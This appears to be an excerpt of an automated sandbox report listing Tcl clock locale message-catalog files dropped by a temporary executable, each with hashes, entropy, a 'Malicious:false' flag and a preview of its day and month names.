                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \. "\u062d"\. "\u0646"\. "\u062b"\. "\u0631"\. "\u062e"\. "\u062c"\. "\u0633"]. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar MONTHS_ABBREV [list \. "\u064a\u0646\u0627"\. "\u0641\u0628\u0631"\. "\u0645\u0627\u0631"\. "\u0623\u0628\u0631"\. "\u0645\u0627\u064a"\. "\u064a\u0648\u0646"\. "\u064a\u0648\u0644"\. "\u0623\u063a\u0633"\. "\u0633\u0628\u062a"\. "\u0623\u0643\u062a"\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):259
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.825452591398057
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmoKNvf/NLoKU3v6xH5oKNo+3vfXM6PYv:4EnLzu8yvf/Nq3v6vF3vfc6q
                                                                                                                                                                                                                                                                                                                                MD5:EEB42BA91CC7EF4F89A8C1831ABE7B03
                                                                                                                                                                                                                                                                                                                                SHA1:74D12B4CBCDF63FDF00E589D8A604A5C52C393EF
                                                                                                                                                                                                                                                                                                                                SHA-256:29A70EAC43B1F3AA189D8AE4D92658E07783965BAE417FB66EE5F69CFCB564F3
                                                                                                                                                                                                                                                                                                                                SHA-512:6CCB2F62986CE1CF3CE78538041A0E4AAF717496F965D73014A13E9B05093EB43185C3C14212DC052562F3F369AB6985485C8C93D1DFC60CF9B8DABEA7CDF434
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y". ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1812
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.023830561129656
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8J5Fe6k+wR+9Gb+Oa+UcP+wR+9Gb+Oa+UD:46I6CNbtdNbQ
                                                                                                                                                                                                                                                                                                                                MD5:4338BD4F064A6CDC5BFED2D90B55D4E8
                                                                                                                                                                                                                                                                                                                                SHA1:709717BB1F62A71E94D61056A70660C6A03B48AE
                                                                                                                                                                                                                                                                                                                                SHA-256:78116E7E706C7D1E3E7446094709819FB39A50C2A2302F92D6A498E06ED4A31B
                                                                                                                                                                                                                                                                                                                                SHA-512:C63A535AD19CBEF5EFC33AC5A453B1C503A59C6CE71A4CABF8083BC516DF0F3F14D3D4F309D33EDF2EC5E79DB00ED1F7D56FD21068F09F178BB2B191603BAC25
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1812
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.020656526954981
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu865Fehk+wR+9Gb+Oa+UXP+wR+9Gb+Oa+UD:46nhCNbadNbQ
                                                                                                                                                                                                                                                                                                                                MD5:3789E03CF926D4F12AFD30FC7229B78D
                                                                                                                                                                                                                                                                                                                                SHA1:AEF38AAB736E5434295C72C14F38033AAFE6EF15
                                                                                                                                                                                                                                                                                                                                SHA-256:7C970EFEB55C53758143DF42CC452A3632F805487CA69DB57E37C1F478A7571B
                                                                                                                                                                                                                                                                                                                                SHA-512:C9172600703337EDB2E36D7470A3AED96CCC763D7163067CB19E7B097BB7877522758C3109E31D5D72F486DD50BF510DDBA50EDD248B899FA0A2EEF09FCBF903
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1812
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.02203966019266
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8k5Fezk+wR+9Gb+Oa+U5P+wRa9Gb+Oa+UD:46ZzCNb0d5bQ
                                                                                                                                                                                                                                                                                                                                MD5:EC736BFD4355D842E5BE217A7183D950
                                                                                                                                                                                                                                                                                                                                SHA1:C6B83C02F5D4B14064D937AFD8C6A92BA9AE9EFB
                                                                                                                                                                                                                                                                                                                                SHA-256:AEF17B94A0DB878E2F0FB49D982057C5B663289E3A8E0E2B195DCEC37E8555B1
                                                                                                                                                                                                                                                                                                                                SHA-512:68BB7851469C24003A9D74FC7FE3599A2E95EE3803014016DDEBF4C5785F49EDBADA69CD4103F2D3B6CE91E9A32CC432DBDFEC2AED0557E5B6B13AED489A1EDA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \. "\u0627\u0644\u0623\u062d\u062f"\. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\. "\u0627\u0644\u062e\u0645\u064a\u0633"\. "\u0627\u0644\u062c\u0645\u0639\u0629"\. "\u0627\u0644\u0633\u0628\u062a"]. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\. "\u0634\u0628\u0627\u0637"\. "\u0622\u0630\u0627\u0631"\. "\u0646\u064a\u0633\u0627\u0646"\. "\u0646\u0648\u0627\u0631"\. "\u062d\u0632\u064a\u0631\u0627\u0646"\. "\u062a\u0645\u0648\u0632"\. "\u0622\u0628"\. "\u0623\u064a\u0644\u0648\u0644"\. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u0644"\. "\u062a\
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2105
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.215818273236158
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46dJRQPQ86AK0xQuEQS3oQsDptuCrQICZmQ8ZVDtN1QFqQLtCSjZMpktvp:hdP6HIZoFnl1Rgx
                                                                                                                                                                                                                                                                                                                                MD5:1A3ABFBC61EF757B45FF841C197BB6C3
                                                                                                                                                                                                                                                                                                                                SHA1:74D623DAB6238D05C18DDE57FC956D84974FC2D4
                                                                                                                                                                                                                                                                                                                                SHA-256:D790E54217A4BF9A7E1DCB4F3399B5861728918E93CD3F00B63F1349BDB71C57
                                                                                                                                                                                                                                                                                                                                SHA-512:154D053410AA0F7817197B7EE1E8AE839BA525C7660620581F228477B1F5B972FE95A4E493BB50365D0B63B0115036DDE54A98450CA4E8048AF5D0AF092BADE5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0434"\. "\u043f\u043d"\. "\u0430\u0442"\. "\u0441\u0440"\. "\u0447\u0446"\. "\u043f\u0442"\. "\u0441\u0431"]. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\. "\u0441\u0435\u0440\u0430\u0434\u0430"\. "\u0447\u0430\u0446\u0432\u0435\u0440"\. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\. "\u0441\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset be MONTHS_ABBREV [list \. "\u0441\u0442\u0434"\. "\u043b\u044e\u0442"\. "\u0441\u043a\u0432"\. "\u043a\u0440\u0441"\. "\u043c\u0430\u0439"\. "\u0447\u0440\u0432"\. "\u043b\u043f\u043d"\. "\u0436\u043d\u
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1819
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.363233187157474
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:46scAXuQfuQVoQAWN5EPIKfD8WQjQ3QgQaQLSqQsQGtQWCQMmt1f:hD/zQaPIKfTSiF3KVfVCqp
                                                                                                                                                                                                                                                                                                                                MD5:11FA3BA30A0EE6A7B2B9D67B439C240D
                                                                                                                                                                                                                                                                                                                                SHA1:EC5557A16A0293ABF4AA8E5FD50940B60A8A36A6
                                                                                                                                                                                                                                                                                                                                SHA-256:E737D8DC724AA3B9EC07165C13E8628C6A8AC1E80345E10DC77E1FC62A6D86F1
                                                                                                                                                                                                                                                                                                                                SHA-512:B776E7C98FB819436C61665206EE0A2644AA4952D739FF7CC58EAFBD549BD1D26028DE8E11B8533814102B31FC3884F95890971F547804BCAA4530E35BDD5CFD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \. "\u041d\u0434"\. "\u041f\u043d"\. "\u0412\u0442"\. "\u0421\u0440"\. "\u0427\u0442"\. "\u041f\u0442"\. "\u0421\u0431"]. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \. "\u041d\u0435\u0434\u0435\u043b\u044f"\. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\. "\u0421\u0440\u044f\u0434\u0430"\. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\. "\u041f\u0435\u0442\u044a\u043a"\. "\u0421\u044a\u0431\u043e\u0442\u0430"]. ::msgcat::mcset bg MONTHS_ABBREV [list \. "I"\. "II"\. "III"\. "IV"\. "V"\. "VI"\. "VII"\. "VIII"\. "IX"\. "X"\. "XI"\. "XII"\. ""]. ::msgcat::mcset bg MONTHS_FULL [list \. "\u042
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2286
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.04505151160981
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8adWa9tUEVcqVc5VcaUTVcHVEVc+7VclEVcNGVcn0VcMG/0VcMjVcMK7YXs+:46C07LetHigetH1YES
                                                                                                                                                                                                                                                                                                                                MD5:B387D4A2AB661112F2ABF57CEDAA24A5
                                                                                                                                                                                                                                                                                                                                SHA1:80DB233687A9314600317AD39C01466C642F3C4C
                                                                                                                                                                                                                                                                                                                                SHA-256:297D4D7CAE6E99DB3CA6EE793519512BFF65013CF261CF90DED4D28D3D4F826F
                                                                                                                                                                                                                                                                                                                                SHA-512:450BB56198AAAB2EEFCD4E24C29DD79D71D2EF7E8D066F3B58F9C5D831F960AFB78C46ECE2DB32EF81454BCCC80C730E36A610DC9BAF06757E0757B421BACB19
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \. "\u09b0\u09ac\u09bf"\. "\u09b8\u09cb\u09ae"\. "\u09ae\u0999\u0997\u09b2"\. "\u09ac\u09c1\u09a7"\. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\. "\u09b6\u09c1\u0995\u09cd\u09b0"\. "\u09b6\u09a8\u09bf"]. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"]. ::msgcat::mcset bn MONTHS_ABBREV [list \. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be\u09b0\u09c0"\.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):259
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.821338044395148
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSyEtJLlpuoo6dmovtvflD/Lo/E3v6xH5ovto+3vflm6PYv:4EnLzu81tvflD/SE3v6etF3vflm6q
                                                                                                                                                                                                                                                                                                                                MD5:764E70363A437ECA938DEC17E615608B
                                                                                                                                                                                                                                                                                                                                SHA1:2296073AE8CC421780E8A3BCD58312D6FB2F5BFC
                                                                                                                                                                                                                                                                                                                                SHA-256:7D3A956663C529D07C8A9610414356DE717F3A2A2CE9B331B052367270ACEA94
                                                                                                                                                                                                                                                                                                                                SHA-512:4C7B9082DA9DDF07C2BE16C359A1A42834B8E730AD4DD5B987866C2CC735402DDE513588A89C8DFA25A1AC6F66AF9FDDBEA8FD500F8526C4641BBA7011CD0D28
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y". ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1102
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.213250101046006
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8WBVUUQ48wsF0nuLsCtJeUFqwv1v3:46BwoL5ScfR3
                                                                                                                                                                                                                                                                                                                                MD5:9378A5AD135137759D46A7CC4E4270E0
                                                                                                                                                                                                                                                                                                                                SHA1:8D2D53DA208BB670A335C752DFC4B4FF4509A799
                                                                                                                                                                                                                                                                                                                                SHA-256:14FF564FAB584571E954BE20D61C2FACB096FE2B3EF369CC5ECB7C25C2D92D5A
                                                                                                                                                                                                                                                                                                                                SHA-512:EF784D0D982BA0B0CB37F1DA15F8AF3BE5321F59E586DBED1EDD0B3A38213D3CEA1CDFC983A025418403400CCE6039B786EE35694A5DFCE1F22CB2D315F5FCF8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \. "dg."\. "dl."\. "dt."\. "dc."\. "dj."\. "dv."\. "ds."]. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \. "diumenge"\. "dilluns"\. "dimarts"\. "dimecres"\. "dijous"\. "divendres"\. "dissabte"]. ::msgcat::mcset ca MONTHS_ABBREV [list \. "gen."\. "feb."\. "mar\u00e7"\. "abr."\. "maig"\. "juny"\. "jul."\. "ag."\. "set."\. "oct."\. "nov."\. "des."\. ""]. ::msgcat::mcset ca MONTHS_FULL [list \. "gener"\. "febrer"\. "mar\u00e7"\. "abril"\. "maig"\. "juny"\. "juliol"\. "agost"\. "setembre"\. "octubre"\. "novembre"\. "desembre"\. ""]. ::msgcat::mcset ca DATE_FORMAT "%d/%m/%Y". ::msg
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1300
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.400184537938628
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8f4sO4fETEtd3N5EPIK+kJQz3R3VJ2PYYITCF3eYGCvt2/v3eG:46/ETKN5EPIKfsxV+pBtMJ
                                                                                                                                                                                                                                                                                                                                MD5:4C5679B0880394397022A70932F02442
                                                                                                                                                                                                                                                                                                                                SHA1:CA5C47A76CD4506D8E11AECE1EA0B4A657176019
                                                                                                                                                                                                                                                                                                                                SHA-256:49CF452EEF0B8970BC56A7B8E040BA088215508228A77032CBA0035522412F86
                                                                                                                                                                                                                                                                                                                                SHA-512:39FA0D3235FFD3CE2BCCFFFA6A4A8EFE2668768757DAFDE901917731E20AD15FCAC4E48CF4ACF0ADFAA38CC72768FD8F1B826464B0F71A1C784E334AE72F857C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \. "Ne"\. "Po"\. "\u00dat"\. "St"\. "\u010ct"\. "P\u00e1"\. "So"]. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \. "Ned\u011ble"\. "Pond\u011bl\u00ed"\. "\u00dater\u00fd"\. "St\u0159eda"\. "\u010ctvrtek"\. "P\u00e1tek"\. "Sobota"]. ::msgcat::mcset cs MONTHS_ABBREV [list \. "I"\. "II"\. "III"\. "IV"\. "V"\. "VI"\. "VII"\. "VIII"\. "IX"\. "X"\. "XI"\. "XII"\. ""]. ::msgcat::mcset cs MONTHS_FULL [list \. "leden"\. "\u00fanor"\. "b\u0159ezen"\. "duben"\. "kv\u011bten"\. "\u010derven"\. "\u010dervenec"\. "srpen"\. "z\u00e1\u0159\u00ed"\. "\u0159\u00edjen"\. "listopad"\. "prosinec"\. ""]
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1156
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.242018456508518
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8xVKE6V4/xPsS9CfXTBfijQT1GqAPwvsvT:461H6y/RsJXTNGqAuKT
                                                                                                                                                                                                                                                                                                                                MD5:F012F45523AA0F8CFEACC44187FF1243
                                                                                                                                                                                                                                                                                                                                SHA1:B171D1554244D2A6ED8DE17AC8000AA09D2FADE9
                                                                                                                                                                                                                                                                                                                                SHA-256:CA58FF5BAA9681D9162E094E833470077B7555BB09EEE8E8DD41881B108008A0
                                                                                                                                                                                                                                                                                                                                SHA-512:5BBC44471AB1B1622FABC7A12A8B8727087BE64BEAF72D2C3C9AAC1246A41D9B7CAFC5C451F24A3ACC681C310BF47BBC3384CF80EB0B4375E12646CB7BB8FFD5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \. "s\u00f8"\. "ma"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f8"]. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \. "s\u00f8ndag"\. "mandag"\. "tirsdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f8rdag"]. ::msgcat::mcset da MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset da MONTHS_FULL [list \. "januar"\. "februar"\. "marts"\. "april"\. "maj"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset da BCE "f.Kr.". ::msgcat::mcset da CE "e.Kr.".
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1222
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.277486792653572
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:4azu8byFouxpZzWsu0biMe5pF9g1tT9egQTqrS8QWmWFUvIvWI3:46CFB/ZzWsu0vpHlrS8QLWFSeWI3
                                                                                                                                                                                                                                                                                                                                MD5:68882CCA0886535A613ECFE528BB81FC
                                                                                                                                                                                                                                                                                                                                SHA1:6ABF519F6E4845E6F13F272D628DE97F2D2CD481
                                                                                                                                                                                                                                                                                                                                SHA-256:CC3672969C1DD223EADD9A226E00CAC731D8245532408B75AB9A70E9EDD28673
                                                                                                                                                                                                                                                                                                                                SHA-512:ACD5F811A0494E04A18035D2B9171FAF3AB8C856AAB0C09AEBE755590261066ADCD2750565F1CB840B2D0111D95C98970294550A4FBD00E4346D2EDBA3A5C957
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \. "So"\. "Mo"\. "Di"\. "Mi"\. "Do"\. "Fr"\. "Sa"]. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \. "Sonntag"\. "Montag"\. "Dienstag"\. "Mittwoch"\. "Donnerstag"\. "Freitag"\. "Samstag"]. ::msgcat::mcset de MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mrz"\. "Apr"\. "Mai"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset de MONTHS_FULL [list \. "Januar"\. "Februar"\. "M\u00e4rz"\. "April"\. "Mai"\. "Juni"\. "Juli"\. "August"\. "September"\. "Oktober"\. "November"\. "Dezember"\. ""]. ::msgcat::mcset de BCE "v. Chr.". ::msgcat::mcset de CE "n. Chr.".
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):812
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.344116560816791
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:4EnLzu8U3S5dkTo7eqepFHvFgt1BAI+5zS17eM5Qz3q6owjI9I3vd3v6B3v9dy:4azu8UlMe5pF9gXDT9egQTqr+rv1vivi
                                                                                                                                                                                                                                                                                                                                MD5:63B8EBBA990D1DE3D83D09375E19F6AC
                                                                                                                                                                                                                                                                                                                                SHA1:B7714AF372B4662A0C15DDBC0F80D1249CB1EEBD
                                                                                                                                                                                                                                                                                                                                SHA-256:80513A9969A12A8FB01802D6FC3015712A4EFDDA64552911A1BB3EA7A098D02C
                                                                                                                                                                                                                                                                                                                                SHA-512:638307C9B97C74BAF38905AC88E73B57F24282E40929DA43ADB74978040B818EFCC2EE2A377DFEB3AC9050800536F2BE1C7C2A7AB9E7B8BCF8D15E5F293F24D9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset de_AT MONTHS_ABBREV [list \. "J\u00e4n"\. "Feb"\. "M\u00e4r"\. "Apr"\. "Mai"\. "Jun"\. "Jul"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dez"\. ""]. ::msgcat::mcset de_AT MONTHS_FULL [list \. "J\u00e4nner"\. "Februar"\. "M\u00e4rz"\. "April"\. "Mai"\. "Juni"\. "Juli"\. "August"\. "September"\. "Oktober"\. "November"\. "Dezember"\. ""]. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d". ::msgcat::mcset de_AT TIME_FORMAT "%T". ::msgcat::mcset de_AT TIME_FORMAT_12 "%T". ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
